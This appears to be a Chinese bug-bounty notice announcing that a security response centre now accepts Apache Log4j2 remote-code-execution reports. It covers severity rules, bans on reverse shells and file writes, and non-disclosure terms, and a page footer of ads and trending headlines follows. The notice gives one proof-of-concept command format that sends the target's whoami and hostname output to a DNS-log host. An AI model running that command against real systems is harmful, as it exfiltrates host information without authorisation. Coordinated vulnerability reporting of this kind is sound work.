关于开始接收Log4j2远程代码执行漏洞的通知二
致各位亲爱的白帽子:
经过第一阶段log4j漏洞的收集和跟进,NSRC将于6月9日开始开放全部业务接收Apache Log4j2相关漏洞。
1、发现目标存在log4j漏洞后,其评级标准:
证明能执行命令为高危,参照格式curl `whoami`.`hostname`.dnslog;证明通过${hostName}获取hostname的为低危。
2、不允许测试过程中进行写入文件、反弹shell、内网渗透等恶意操作,否则该行为视为违规,情节严重者将追究法律责任。更多细节请参考《src行业安全测试规范》。
3、在漏洞未经修复前,严禁对外披露漏洞详情,否则将取消所有奖励。
4、漏洞等级会按照漏洞实际影响和危害会进行调整。
5、Apache Log4j2漏洞不参与任何活动,包括但不限于主打产品、积分翻倍、年度季度奖励等。
感谢各位的支持与理解~
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 习近平总书记这样寄语当代青年 4923461
- 2 珠海暴雨 医院后山下出巨大瀑布 4970418
- 3 金价跌至近一个月低点 4834885
- 4 “假日经济”持续升温 4717055
- 5 凤凰传奇北京站万人蹦迪 4644498
- 6 广州队门将背部照片:两道血印 4598398
- 7 12306回应部分高铁票价将上涨 4492955
- 8 iPhone16系列最新机模曝光 4314463
- 9 每天只需睡2小时说法不靠谱 4258111
- 10 贪官获刑:有人拿1000万帮他买房 4173029